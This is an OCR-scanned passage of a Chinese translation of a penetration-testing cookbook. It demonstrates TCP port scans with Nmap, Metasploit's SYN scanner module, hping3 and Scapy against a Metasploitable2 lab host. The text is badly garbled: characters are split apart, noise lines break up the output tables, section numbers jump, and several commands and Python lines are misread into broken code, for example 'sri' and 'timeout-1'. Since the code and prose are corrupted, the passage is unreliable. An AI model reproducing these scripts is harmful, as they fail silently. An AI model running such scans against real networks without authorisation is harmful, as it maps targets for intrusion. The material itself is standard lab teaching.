在 这 个 例子 中 ， 目 标 IP 地 址 的 端口 21、80 和 443 上 执行 了 SYN 扫描 。 我 们 也 可 
以 使 用 Nmap 来 扫描 主机 序列 ， 通 过 标明 要 扫描 的 第 一 个 和 最 后 一 个 端口 号 ， 以 破 


折 号 分 隔 : 


root@KaliLinux:~# nmap -SS 172.16.36.135 -p 20-25 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 21:48 EST 


Nmap scan report for 172.16.36.135 

Host is up (0.00035s latency). 

PORT STATE SERVICE 

20/tcp closed ftp-data 

21/tcp open ftp 

22/tcp open ssh 

23/tcp open telnet 

24/tcp closed priv-mail 

25/tcp open smtp 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds 


在 所 提供 的 例子 中 ，SYN 扫描 在 TCP 20 到 25 端口 上 执行 。 除 了 拥有 指定 被 扫描 
端口 的 能 力 之 外 。Nmap 同时 拥有 配置 好 的 1000 和 常用 端口 的 列表 。 我 们 可 以 执 


行 这 些 端口 上 的 扫描 ， 通 过 不 带 任何 端口 指定 信息 来 运行 Nmap : 


root@KaliLinux:~# nmap -sS 172.16.36.135 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 21:46 EST 
Nmap scan report for 172.16.36.135 
Host is up (0.00038s latency). N 
ot shown: 977 closed ports 

PORT STATE SERVICE 

21/tcp open ftp 

22/tcp open ssh 

237 EGD open telnet 

25/tcp open smtp 

53/tcp open domain 

80/tcp open http 

111/tcp open rpcbind 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 
512/tcp open exec 

513/tcp open login 

514/tcp open shell 

1099/tcp open rmiregistry 
1524/tcp open ingreslock 

2049/tcp open nfs 

2121/tcp open ccproxy-ftp 
3306/tcp open mysql 

5432/tcp open postgresql 

5900/tcp open vnc 

6000/tcp open X11 

6667/tcp open irc 

8009/tcp open ajp13 

8180/tcp open unknown 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 13.17 seconds 


在 上 面 的 例子 中 ， 扫 描 了 Nmap 定义 的 1000 个 常用 端口 ， 用 于 识别 
Metasploitable2 系统 上 的 大 量 开放 端口 。 虽 然 这 个 技巧 在 是 被 多 数 设 备 上 很 高 效 ， 
但 是 也 可 能 无 法 识别 模糊 的 服务 或 者 不 常见 的 端口 组 合 。 如 果 扫 描 在 所 有 可 能 的 
TCP 端口 上 执行 ， 所 有 可 能 的 端口 地 址 值 都 需要 被 扫描 。 定 义 了 源 端 口 和 目标 端口 
地 址 的 TCP 头 部 部 分 是 16 位 长 。 并 且 ， 每 一 位 可 以 为 1 或 者 0。 因 此 ， 共 

有 2 ** 16 或 者 65536 个 可 能 的 TCP 端口 地 址 。 对 于 要 扫描 的 全 部 可 能 的 地 址 
空间 ， 需 要 提供 0 到 65535 的 端口 范围 ， 像 这 样 : 


root@KaliLinux:~# nmap -sS 172.16.36.135 -p 0-65535 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 21:51 EST 
Nmap scan report for 172.16.36.135 
Host is up (0.00033s latency). 
Not shown: 65506 closed ports 
PORT STATE SERVICE 

21/tcp open ftp 

22/tcp open ssh 

237 EGD open telnet 

25/tcp open smtp 

53/tcp open domain 

80/tcp open http 

111/tcp open rpcbind 
139/tcp | open netbios-ssn 
445/tcp open microsoft-ds 
512/tcp open exec 

513/tcp open login 

514/tcp open shell 
1099/tcp open rmiregistry 
1524/tcp open ingreslock 
2049/tcp open nfs 

2121/tcp open ccproxy-ftp 
3306/tcp open mysql 
3632/tcp open distccd 
5432/tcp open postgresql 
5900/tcp open vnc 

6000/tcp open X11 

6667/tcp open irc 

6697/tcp open unknown 
8009/tcp open 4ajp13 
8180/tcp open unknown 
8787/tcp open unknown 
34789/tcp open unknown 
50333/tcp open unknown 
56375/tcp open unknown 
57385/tcp open unknown 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 16.78 seconds 


这 个 例子 中 ，Metasploitable2 系统 上 所 有 可 能 的 65536 fe TCP 地 址 都 扫描 了 一 
遍 。 要 注意 该 扫描 中 识别 的 多 数 服务 都 在 标准 的 Nmap 1000 扫描 中 识别 过 了 。 这 
就 表明 在 尝试 识别 目标 的 所 有 可 能 的 攻击 面 的 时 候 ， 完 整 扫描 是 个 最 佳 实践 。 
Nmap 可 以 使 用 破 折 号 记 法 ， 扫 描 主机 列表 上 的 TCP 端口 : 


root@KaliLinux:~# nmap 172.16.36.0-255 -sS -p 80 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 21:56 EST 
Nmap scan report for 172.16.36.1 Host is up (0.00023s latency). 
PORT STATE SERVICE 

80/tcp closed http 

MAC Address: 00:50:56:C0:00:08 (VMware) 


Nmap scan report for 172.16.36.2 Host is up (0.00018s latency). 
PORT STATE SERVICE 

80/tcp closed http 

MAC Address: 00:50:56:FF:2A:8E (VMware) 


Nmap scan report for 172.16.36.132 Host is up (0.00047s latency) 


PORT STATE SERVICE 
80/tcp closed http 
MAC Address: 00:0C:29:65:FC:D2 (VMware) 


Nmap scan report for 172.16.36.135 

Host is up (0.00016s latency). 

PORT STATE SERVICE 

80/tcp open http 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap scan report for 172.16.36.180 
Host is up (0.0029s latency). 

PORT STATE SERVICE 

80/tcp open http 


Nmap done: 256 IP addresses (5 hosts up) scanned in 42.85 second 
S 


这 个 例子 中 ，TCP 80 端口 的 SYN 扫描 在 指定 地 址 范围 内 的 所 有 主机 上 执行 。 虽 然 
这 个 特定 的 扫描 仅仅 执行 在 单个 端口 上 ，Nmap 也 能 够 同时 扫描 多 个 系统 上 的 多 个 
端口 和 端口 范围 。 此 外 ，Nmap 也 能 够 进行 配置 ， 基 于 IP 地址 的 输入 列表 来 扫描 
主机 。 这 可 以 通过 -iL 选项 并 指定 文件 名 ， 如 果 文 件 存放 于 执行 目录 中 ， 或 者 文 
件 路 径 来 完成 。Nmap 之 后 会 遍历 输入 列表 中 的 每 个 地 址 ， 并 对 地 址 执行 特定 的 扫 


描 。 


root@KaliLinux:~# cat iplist.txt 
172.16.36.1 

172.16.36.2 

172.16.36.132 

172.16.36.135 


root@KaliLinux:~# nmap -sS -iL iplist.txt -p 80 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-17 21:59 EST 
Nmap scan report for 172.16.36.1 

Host is up (0.00016s latency). 

PORT STATE SERVICE 

80/tcp closed http 

MAC Address: 00:50:56:C0:00:08 (VMware) 


Nmap scan report for 172.16.36.2 

Host is up (0.00047s latency). 

PORT STATE SERVICE 

80/tcp closed http 

MAC Address: 00:50:56:FF:2A:8E (VMware) 


Nmap scan report for 172.16.36.132 

Host is up (0.00034s latency). 

PORT STATE SERVICE 

80/tcp closed http 

MAC Address: 00:0C:29:65:FC:D2 (VMware) 


Nmap scan report for 172.16.36.135 

Host is up (0.00016s latency). 

PORT STATE SERVICE 

80/tcp open http 

MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 4 IP addresses (4 hosts up) scanned in 13.05 seconds 


工作 原理 


Nmap SYN 扫描 背后 的 底层 机 制 已 经 讨论 过 了 。 但 是 ，Nmap 拥有 多 线程 功能 ， 是 
用 于 执行 这 类 扫描 的 快速 高 效 的 方式 。 


3.8 Metasploit 隐秘 扫描 


除了 其 它 已 经 讨论 过 的 工具 之 外 ，Metasploit 拥有 用 于 SYN 扫描 的 辅助 模块 。 这 
个 秘籍 展示 了 如 何 使 用 Metasploit 来 执行 TCP 隐秘 扫描 。 


准备 


为 了 使 用 Metasploit 执行 TCP 隐秘 扫描 ， 你 需要 一 个 运行 TCP 网 络 服务 的 远程 服 
务 器 。 这 个 例子 中 我 们 iu Metasploitable2 实例 来 执行 任务 。 配 置 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 » 
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Metasploit 拥有 可 以 对 特定 TCP 端口 执行 SYN 扫描 的 辅助 模块 。 为 了 在 Kali 中 局 
动 Metasploit， 我 们 在 终端 中 执行 msfconsole 命令 。 


root@KaliLinux:~# msfconsole 
IIIIII dTb.dTb Ee EE 


II 4! V UB EAE Ap t eae 

II 6. psu SL le Nea 

II RE eee puse; eap Ne cos d 

TT vun ct Pi PCM A | Ae! 
IIIIII 'YvP' pe e ene 


I love shells --egypt 


Using notepad to track pentests? Have Metasploit Pro report on h 
osts, services, sessions and evidence -- type 'go pro' to launch 
it now. 


-[ metasploit v4.6.0-dev [core:4.6 api:1.0] 
+ -- --=[ 1053 exploits - 590 auxiliary - 174 post 
+ -- --=[ 275 payloads - 28 encoders - 8 nops 


msf > use auxiliary/scanner/portscan/syn 
msf auxiliary(syn) > show options 


Module options (auxiliary/scanner/portscan/syn): 


Name Current Setting Required Description 
BATCHSIZE 256 yes The number of hosts to 
scan per set 

INTERFACE no The name of the interf 
ace 

PORTS 1-100090 yes Ports to scan (e.g. 22 
25,80,110-900) 

RHOSTS yes The target address ran 
ge or CIDR identifier 

SNAPLEN 65535 yes The number of bytes to 
capture 

THREADS 1 yes The number of concurre 
nt threads 

TIMEOUT 500 yes The reply read timeout 


in milliseconds 


为 了 在 Metasploit 中 执行 SYN 扫描 ， 以 辅助 模块 的 相对 路 径 调用 use 命令 
模块 被 选中 ， 可 以 执行 show options 命令 来 确认 或 修改 扫描 配置 。 这 个 命 
Ke POA HRS > E 

4 name ^ current settings ^ required 和 description ° name 列 标 出 
了 每 个 可 配置 变量 的 名 称 。 current settings 列 列 出 了 任何 给 定 变 量 的 现 有 配 
置 。 required 列 标 出 对 于 任何 给 定 变 量 ， 值 是 否 是 必须 的 。 description 列 描 
述 了 每 个 变量 的 功能 。 任 何 给 定 变 量 的 值 可 以 使 用 set 命令 ， 并 且 将 新 的 值 作为 
参数 来 修改 。 
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msf auxiliary(syn) > set RHOSTS 172.16.36.135 
RHOSTS -» 172.16.36.135 

msf auxiliary(syn) > set THREADS 20 

THREADS -» 20 

msf auxiliary(syn) > set PORTS 80 

PORTS -» 80 

msf auxiliary(syn) > show options 


Module options (auxiliary/scanner/portscan/syn): 


Name Current Setting Required Description 

BATCHSIZE 256 yes The number of hosts to 
scan per set 

INTERFACE no The name of the interfa 
ce 

PORTS 80 yes Ports to scan (e.g. 222 
5,80,110-900) 

RHOSTS 172.16.36.135 yes The target address rang 
e or CIDR identifier 

SNAPLEN 65535 yes The number of bytes to 
capture 

THREADS 20 yes The number of concurren 
t threads 

TIMEOUT 500 yes The reply read timeout 


in milliseconds 


在 上 面 的 例子 中 ， RHOSTS 值 修 改 为 我 们 打算 扫描 的 远程 系统 的 IP 地 址 。 此 外 ， 
线程 数量 修改 为 20。 THREADS 的 值 定义 了 在 后 台 执 行 的 当前 任务 数量 。 确 定 线程 
数量 涉及 到 寻找 一 个 平衡 ， 既 能 提升 任务 速度 ， 又 不 会 过 度 消 耗 系 统 资 源 。 对 于 多 
数 系统 ，20 个 线程 可 以 足够 快 ， 并 且 相 当 人 合理。 PORTS 值 设 为 TCP 端口 

80 (HTTP) 。 修 改 了 必要 的 变量 之 后 ， 可 以 再 次 使 用 show options 命令 来 验 
证 。 一 旦 所 需 配 置 验证 完毕 ， 就 可 以 执行 扫描 了 。 


msf auxiliary(syn) > run 


[*] TCP OPEN 172.16.36.135:80 [*] Scanned 1 of 1 hosts (100% com 
plete) 

[*] Auxiliary module execution completed The run command is used 
in Metasploit to execute the selected auxiliary module. In the 
example provided, the run command executed a TCP SYN scan agains 
t port 80 of the specified IP address. We can also run this TCP 
SYN scan module against a sequential series of TCP ports by sup 
plying the first and last values, separated by a dash notation: 


msf auxiliary(syn) > set PORTS 0-100 
PORTS -» 0-100 
msf auxiliary(syn) > show options 


Module options (auxiliary/scanner/portscan/syn): 


Name Current Setting Required Description 

BATCHSIZE 256 yes The number of hosts to 
scan per set 

INTERFACE no The name of the interfa 
ce 

PORTS 0-100 yes Ports to scan (e.g. 222 
5,80,110-900) 

RHOSTS 172.16.36.135 yes The target address rang 
e or CIDR identifier 

SNAPLEN 65535 yes The number of bytes to 
capture 

THREADS 20 yes The number of concurren 
t threads 

TIMEOUT 500 yes The reply read timeout 


in milliseconds 
msf auxiliary(syn) > run 


TCP OPEN 172.16.36.135:21 

TCP OPEN 172.16.36.135:22 

TCP OPEN 172.16.36.135:23 

TCP OPEN 172.16.36.135:25 

TCP OPEN 172.16.36.135:53 

TCP OPEN 172.16.36.135:80 

Scanned 1 of 1 hosts (100% complete) 
Auxiliary module execution completed 


上 面 的 例子 中 ， 所 指定 的 远程 主机 的 钱 100 A TCP 端口 上 执行 了 TCP SYN da 
描 。 虽 然 这 个 扫描 识别 了 目标 系统 的 多 个 设备 ， 我 们 不 能 确认 所 有 设备 都 识别 出 
来 ， 除 非 所 有 可 能 的 端口 地 址 都 扫描 到 。 定 义 来 源 和 目标 端口 地 址 的 TCP 头 部 部 分 


x 16 位 长 。 并 且 ， 每 一 位 可 以 为 1 或 者 0。 因 此 ， 共 有 2 ** 16 3 65536 个 可 
能 的 TCP 端口 地 址 。 对 于 要 扫描 的 整个 地 址 空间 ， 需 要 提供 0 到 65535 的 端口 范 
， 像 这 样 : 


msf auxiliary(syn) > set PORTS 0-65535 
PORTS => 0-65535 
msf auxiliary(syn) > show options 


Module options (auxiliary/scanner/portscan/syn): 


Name Current Setting Required Description 

BATCHSIZE 256 yes The number of hosts to 
scan per set 

INTERFACE no The name of the interfa 
ce 

PORTS 0-65535 yes Ports to scan (e.g. 222 
5,80,110-900) 

RHOSTS 172.16.36.135 yes The target address rang 
e or CIDR identifier 

SNAPLEN 65535 yes The number of bytes to 
capture 

THREADS 20 yes The number of concurren 
t threads 

TIMEOUT 500 yes The reply read timeout 


in milliseconds 
msf auxiliary(syn) > run 


TCP OPEN 172.16.36.135:21 

TCP OPEN 172.16.36.135:22 

TCP OPEN 172.16.36.135:23 

TCP OPEN 172.16.36.135:25 

TCP OPEN 172.16.36.135:53 

TCP OPEN 172.16.36.135:80 

TCP OPEN 172.16.36.135:111 
TCP OPEN 172.16.36.135:139 
TCP OPEN 172.16.36.135:445 
TCP OPEN 172.16.36.135:512 
TCP OPEN 172.16.36.135:513 
TCP OPEN 172.16.36.135:514 
TCP OPEN 172.16.36.135:1099 
TCP OPEN 172.16.36.135:1524 
TCP OPEN 172.16.36.135:2049 
TCP OPEN 172.16.36.135:2121 
TCP OPEN 172.16.36.135:3306 
TCP OPEN 172.16.36.135:3632 
TCP OPEN 172.16.36.135:5432 
TCP OPEN 172.16.36.135:5900 
TCP OPEN 172.16.36.135:6000 
TCP OPEN 172.16.36.135:6667 
TCP OPEN 172.16.36.135:6697 


[record n a menée Ue rm E E om ue e e d rm Er ed rn Le amem m 
S PEE ec tectum Cen mech ,ke Se of cee Ot oC rcc en, 
LL LL LL LL LLL LLL. L.L.L.L.L.L. LL. LL. LL 


[*] TCP OPEN 172.16.36.135:8009 

[*] TCP OPEN 172.16.36.135:8180 

[*] TCP OPEN 172.16.36.135:8787 

[*] TCP OPEN 172.16.36.135:34789 

[*] TCP OPEN 172.16.36.135:50333 

[*] TCP OPEN 172.16.36.135:56375 

[*] TCP OPEN 172.16.36.135:57385 

[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 


在 这 个 例子 中 ， 远 程 系 统 的 所 有 开放 端口 都 由 扫描 所 有 可 能 的 TCP 端口 地 址 来 识 
别 。 我 们 也 可 以 修改 扫描 配置 使 用 破 折 号 记 法 来 扫描 地 址 序列 。 


msf auxiliary(syn) > set RHOSTS 172.16.36.0-255 
RHOSTS => 172.16.36.0-255 
msf auxiliary(syn) > show options 


Module options (auxiliary/scanner/portscan/syn): 


Name Current Setting Required Description 

BATCHSIZE 256 yes The number of hosts to 
scan per set 

INTERFACE no The name of the interfa 
ce 

PORTS 80 yes Ports to scan (e.g. 222 
5,80,110-900) 

RHOSTS 172.16.36.0-255 yes The target address rang 
e or CIDR identifier 

SNAPLEN 65535 yes The number of bytes to 
capture 

THREADS 20 yes The number of concurren 
t threads 

TIMEOUT 500 yes The reply read timeout 


in milliseconds 
msf auxiliary(syn) > run 
[*] TCP OPEN 172.16.36.135:80 


[*] Scanned 256 of 256 hosts (100% complete) 
[*] Auxiliary module execution completed 


这 个 例子 中 ，TCP SYN 扫描 执行 在 由 RHOST 变量 指定 的 所 有 主机 地 址 的 80 端口 
上 。 与 之 相似 ， RHOSTS 可 以 使 用 CIDR 记 法 定义 网 络 范围 。 


msf auxiliary(syn) > set RHOSTS 172.16.36.0/24 
RHOSTS -» 172.16.36.0/24 
msf auxiliary(syn) > show options 


Module options (auxiliary/scanner/portscan/syn): 


Name Current Setting Required Description 

BATCHSIZE 256 yes The number of hosts to 
scan per set 

INTERFACE no The name of the interfa 
ce 

PORTS 80 yes Ports to scan (e.g. 222 
5,80,110-900) 

RHOSTS 172.16.36.0/24 yes The target address rang 
e or CIDR identifier 

SNAPLEN 65535 yes The number of bytes to 
capture 

THREADS 20 yes The number of concurren 
t threads 

TIMEOUT 500 yes The reply read timeout 


in milliseconds 
msf auxiliary(syn) > run 
[*] TCP OPEN 172.16.36.135:80 


[*] Scanned 256 of 256 hosts (100% complete) 
[*] Auxiliary module execution completed 


工作 原理 
Metasploit SYN 扫描 辅助 模块 背后 的 底层 原理 和 任何 其 它 SYN 扫描 工具 一 样 。 对 
于 每 个 被 扫描 的 端口 ， c SYN &1 &, » SYN*ACK an Fail 于 识别 活动 服务 。 


使 用 MEtasploit 可 能 更 加 有 吸引 力 ， 因 为 它 拥 有 交互 控制 台 ， 也 因为 它 是 个 已 经 被 
多 数 渗透 测试 者 熟知 的 工具 。 


7.9 hping3 隐秘 扫描 


除了 我 们 之 前 学 到 了 探索 技巧 ，hping3 也 可 以 用 于 执行 端口 扫描 。 这 个 秘籍 展示 了 
如 何 使 用 hping3 来 执行 TCP 隐秘 扫描 。 


准备 
为 了 使 用 hping3 执行 TCP 隐秘 扫描 ， 你 需要 一 个 运行 TCP 网 络 服务 的 远程 服务 


器 。 A | 子 中 我 们 使 用 Metasploitable2 实例 来 执行 任务 。 配 置 Metasploitable2 
的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" 秘 籍 。 


操作 步骤 


除了 我 们 之 前 学 到 了 探索 技巧 ，hping3 也 可 以 用 于 执行 端口 扫描 。 为 了 使 用 
hping3 执行 端口 扫描 ， 我 们 需要 以 一 个 整数 值 使 用 --scan 模式 来 指定 要 扫描 的 


端口 号 。 


root@KaliLinux:~# hping3 172.16.36.135 --scan 80 -S 

Scanning 172.16.36.135 (172.16.36.135), port 80 

1 ports to scan, use -V to see all the replies 

Pacco pas aonana d a pope +----- oo + 

|port| serv name | flags |ttl| id | win | len | 

Ppa seh So a 让 Reese sets TE dL + 
80 http Dojo ss 64 © 5840 46 

All replies received. Done. 

Not responding ports: 


上 面 的 例子 中 ，SYN 扫描 执行 在 指定 IP 地 址 的 TCP 端口 80 Eo -s 选项 指明 了 
发 给 远程 系统 的 封包 中 激活 的 TCP 标识 。 表 格 展 示 了 接收 到 的 响应 封包 中 的 属 

性 。 我 们 可 以 从 输出 中 看 到 ， 接 收 到 了 SYN+ACK 响应 ， 所 以 这 表示 目标 主机 端口 
80 是 开放 的 。 此 外 ， 我 们 可 以 通过 输入 够 好 分 隔 的 端口 号 列表 来 扫描 多 个 端口 ， 像 
这 样 : 


root@KaliLinux:~# hping3 172.16.36.135 --scan 22,80,443 -S 
Scanning 172.16.36.135 (172.16.36.135), port 22,80,443 
3 ports to scan, use -V to see all the replies 


dece aona eene cce yes ccce ducere e d Poss + 
|port| serv name | flags |ttl| id | win | len | 
Phos bee eee ec eco eee TO eed Lec eee Hehe + 
22 ssh or reco © 5840 46 
80 http SAC tO © 5840 46 


All replies received. Done. 
Not responding ports: 


在 上 面 的 扫描 输出 中 ， 你 可 以 看 到 ， 仅 仅 展 示 了 接受 到 SYNTACK 标识 的 结果 。 要 
注意 和 发 送 到 443 端口 的 SYN 请 求 相 关 的 响应 并 没有 展示 。 从 输出 中 可 以 看 出 ， 
我 们 可 以 通过 使 用 -v 选项 增加 详细 读 来 查看 所 有 响应 。 此 外 ， 可 以 通过 传递 第 一 
个 和 最 后 一 个 端口 地 址 值 ， 来 扫描 端口 范围 ， 像 这 样 : 


root@KaliLinux:~# hping3 172.16.36.135 --scan 0-100 -S 
Scanning 172.16.36.135 (172.16.36.135), port 0-100 
101 ports to scan, use -V to see all the replies 


qp S PROC pp jac Sa + 
|port| serv name | flags |ttl| id | win | len | 
p ES d s dedecus eye esce bxc + 
21 ftp S-A: 64 © 5840 46 
22 ssh OPTAT 64 © 5840 46 
23 telnet SAC 64 © 5840 46 
25 smtp OM ACE 64 © 5840 46 
53 domain STAT: 64 © 5840 46 
80 http SERAN 64 © 5840 46 


All replies received. Done. 
Not responding ports: 


这 个 例子 中 ，100 个 端口 的 扫描 足以 识别 Metasploitable2 系统 上 的 服务 。 但 是 ， 
为 了 执行 所 有 TCP 端口 的 扫描 ， 需 要 扫描 所 有 可 能 的 端口 地 址 值 。 定 义 了 源 端口 
和 目标 端口 地 址 的 TCP 头 部 部 分 是 16 位 长 。 并 且 ， 每 一 位 可 以 为 1 或 者 0。 因 
此 ， 共 有 2 ** 16 或 者 65536 个 可 能 的 TCP > 端口 地 址 。 对 于 要 扫描 的 全 部 可 能 
的 地 址 空间 ， 需 要 提供 0 到 65535 的 端口 范围 ， 像 这 样 


root@KaliLinux:~# hping3 172.16.36.135 --scan 0-65535 -S 
Scanning 172.16.36.135 (172.16.36.135), port 0-65535 
65536 ports to scan, use -V to see all the replies 


qp aaa nooo Maoa ae Tq poc Tace + 
|port| serv name | flags |ttl| id | win | len | 
p S Poe e ae ees So oS sie bxc + 
21 ftp sya tA C 64 © 5840 46 

22 ssh aye o/s e 64 © 5840 46 

23 telnet "ejm uA Nn 64 © 5840 46 

25 smtp UE cy Ava 64 © 5840 46 

53 domain Syn ai Ne C 64 © 5840 46 
111 sunrpc NOn ed ey 64 © 5840 46 
1099 rmiregistry: .S..A.. 64 © 5840 46 
1524 ingreslock pen OS 64 © 5840 46 
2121 iprop roi A 64 © 5840 46 
8180 dore 64 © 5840 46 
34789 asia aie c 64 © 5840 46 
512 exec Sa oo 64 © 5840 46 
513 login S CAN: 64 © 5840 46 
514 shell sin alate 64 © 5840 46 
3632 distcc SEA 64 © 5840 46 
5432 postgresql : .S..A... 64 © 5840 46 
56375 dor. 64 © 5840 46 
80 http Ero 64 © 5840 46 
445 microsoft-d: .S..A.. 64 © 5840 46 
2049 nfs Ln An 64 © 5840 46 
6667 ircd MA 64 © 5840 46 
6697 OA 64 © 5840 46 
57385 人 二 64 © 5840 46 
139 netbios-ssn: .S..A.. 64 © 5840 46 
6000 x11 "OA 64 © 5840 46 
3306 mysql ORAS 64 © 5840 46 
5900 TST A 64 © 5840 46 
8787 STATS: 64 © 5840 46 
50333 .S..A... 64 © 5840 46 
8009 SITAT 64 © 5840 46 


All replies received. Done. 
Not responding ports: 


工作 原理 
hping3 不 用 于 一 些 已 经 提 到 的 其 它 工具 ， 因 为 它 并 没有 SYN 扫描 模式 。 但 是 反 


之 ， 它 允许 你 指定 TCP 封包 发 送 时 的 激活 的 TCP 标识 。 在 秘籍 中 的 例子 
To -s 选项 让 hping3 使 用 TCP 封包 的 SYN 标识 。 


3.10 Scapy 连接 扫描 


在 多 数 扫描 工具 当中 ，TCP 连接 扫描 比 SYN 扫描 更 加 容易 。 这 是 因为 TCP 连接 
扫描 并 不 需要 为 了 生成 和 注入 SYN 扫描 中 使 用 的 原始 封包 而 提升 权限 。Scapy 是 
它 的 一 大 例外 。Scapy 实际 上 非常 难以 执行 完全 的 TCP 三 次 握手 ， 也 不 实用 。 但 
是 ， 出 于 更 好 理解 这 个 过 程 的 目的 ， 我 们 来 看 看 如 何 使 用 Scapy 执行 连接 扫描 。 


准备 


为 了 使 用 Scapy 执行 全 连接 扫描 ， 你 需要 一 个 运行 UDP 网 络 服务 的 远程 服务 器 。 
这 个 例子 中 我 们 使 用 Metasploitable2 实例 来 执行 任务 。 配 置 Metasploitable2 的 更 
多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2” 秘 籍 。 


此 外 ， 这 一 节 也 需要 编写 脚本 的 更 多 信息 ， 请 参考 第 一 章 中 的 “使 用 文本 编辑 器 
*VIM f« Nano) 。 


操作 步骤 


Scapy 中 很 难 执行 全 连接 扫描 ， 因 为 系统 内 核 不 知道 你 在 Scapy 中 发 送 的 请 求 ， 并 
且 尝 试 阻止 你 和 远程 系统 建立 完整 的 三 次 握手 。 你 可 以 在 Wireshark 或 tcpdump 

中 ， 通 过 发 送 SYN 请 求 并 嗅 探 相 关 流 量 来 看 到 这 个 过 程 。 当 你 接收 到 来 自 远程 系 
统 的 SYN+ACK 响应 时 ，Linux 内 核 会 拦截 它 ， 并 将 其 看 做 来 源 不 明 的 响应 ， 因 为 
它 不 知道 你 在 Scapy 中 发 送 的 请 求 。 并 且 系 统 会 自动 使 用 TCP RST 封包 来 回 
复 ， 因 此 会 断 开 握手 过 程 。 考 虑 下 面 的 例子 : 


#!/usr/bin/python 


import logging 
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 
from scapy.all import * 


response = sri(IP(dst="172.16.36.135")/TCP(dport=80, flags='S')) 
reply = sri(IP(dst="172.16.36.135")/TCP(dport=80, Flags='A', ack=( 
respon se[TCP].seq + 1))) 


这 个 Python 脚本 的 例子 可 以 用 做 POC 来 演 系统 破坏 三 次 握手 的 问题 。 这 个 脚本 假 
设 你 将 带 有 开放 端口 活动 系统 作为 目标 。 因 此 ， 人 假设 SYN+ACK 回复 会 作为 初始 
SYN 请 求 的 响应 而 返回 。 即 使 发 送 了 最 后 的 ACK 回复 ， 完 成 了 握手 ，RST 封包 也 
会 阻止 连接 建立 。 我 们 可 以 通过 观察 封包 发 送 和 接受 来 进一步 演示 。 


#!/usr/bin/python 


import logging 
logging. getLogger("Sscapy. runtime") .setLevel(logging.ERROR) 
from scapy.all import * 


SYN = IP(dst="172.16.36.135")/TCP(dport=80, flags='S') 


print "-- SENT --" 
SYN. display () 


print "\n\n-- RECEIVED --" 
response = sr1i(SYN, timeout=1, verbose=0) 
response.display() 


if int(response[TCP].flags) -- 18: 

print "\n\n-- SENT --" 

ACK = IP(dst="172.16.36.135")/TCP(dport=80, flags='A',ack=(re 
sponse[ TCP].seq + 1)) 

response2 = sri(ACK, timeout-1, verbose=0) 

ACK. display() 

print "\n\n-- RECEIVED --" 

response2.display() 
else: 

print "SYN-ACK not returned" 


Cy 


在 这 个 Python 脚本 中 ， 每 个 发 送 的 封包 都 在 传输 之 前 展示 ， 并 且 每 个 收 到 的 封 
都 在 到 达 之 后 展示 。 在 检验 每 个 封包 所 激活 的 TCP 标识 的 过 程 中 ， 我 们 可 以 看 
到 ， 三 次 握手 失败 了 。 考 虑 由 脚本 生成 的 下 列 输出 : 


root@KaliLinux:~# ./tcp connect.py 


-- SENT - 
###[ IP ]### 
version = 4 
ihl = None 
tos = 0x0 
len = None 
id m 
flags - 
frag - 0 
ttl = 64 
proto = tcp 
chksum = None 
src = 172.16.36.180 
dst = 172.16.36.135 
\options \ 
###[ TCP ]### 
sport = ftp_data 
dport = http 
seq = 0 


ack = 0 
dataofs = None 
reserved - 0 
flags = S 
window = 8192 
chksum = None 
urgptr = 0 
options = {} 

-- RECEIVED - 

###[ IP ]### 
version = 4L 
ihl = 5L 
tos = 0x0 
len = 44 
id = 0 
flags = DF 
frag = OL 
ttl = 64 
proto = tcp 
chksum = 0x9970 
src = 172.16.36.135 
dst = 172.16.36.180 


\options \ 
###[ TCP ]### 


sport = http 
dport = ftp_data 
seq = 3013979073L 
ack = aL 
dataofs = 6L 
reserved = OL 
flags = SA 
window = 5840 
chksum = 0x801e 
urgptr = 0 
options = [('MSS', 1460) ] 
###[ Padding ]### 
load = '\x00\x00' 
-- SENT - 
HHH [ IP ]### 
version = 4 
ihl = None 
tos = 0x0 
len = None 
id =. al 
flags = 
frag = 0 
ttl = 64 
proto = tcp 
chksum = None 
src = 172.16.36.180 
dst = 172.16.36.135 


\options \ 
###[ TCP ]### 


sport - ftp data 
dport = http 
seq = 0 
ack = 3013979074L 
dataofs = None 
reserved = 0 
flags =A 
window = 8192 
chksum = None 
urgptr = 0 
options = {} 
-- RECEIVED - 
HHH [ IP ]### 
version = 4L 
ihl = 5L 
tos = 0x0 
len = 40 
id = 0 
flags = DF 
frag = OL 
ttl = 64 
proto = tcp 
chksum = 0x9974 
src = 172.16.36.135 
dst = 172.16.36.180 
\options X 
###[ TCP ]### 
sport = http 
dport = ftp_data 
seq = 3013979074L 
ack = 0 
dataofs = 5L 
reserved = OL 
flags = R 
window = 0 
chksum = Qxaeb8 
urgptr = 0 
options = {} 
###[ Padding ]### 
load = '\x00\x00\xO0\x00\x00\x00' 


在 脚本 的 输出 中 ， 我 们 看 到 了 四 个 封包 。 第 一 个 封包 是 发 送 的 SYN 请 求 ， 第 二 个 
封包 时 接收 到 的 SYN+ACK 回复 ， 第 三 个 封包 时 发 送 的 ACK 回复 ， 之 后 接收 到 了 
RST 封包 ， 它 是 最 后 的 ACK 回复 的 响应 。 最 后 一 个 封包 表明 ， 在 建立 连接 时 出 现 
了 问题 。Scapy 中 可 能 能 够 建立 完成 的 三 次 握手 ， 但 是 它 需 要 对 本 地 |IP 表 做 一 些 
调整 。 尤 其 是 ， 如 果 你 去 掉 发 往 远 程 系统 的 TSR 封包 ， 你 就 可 以 完成 握手 。 通 过 
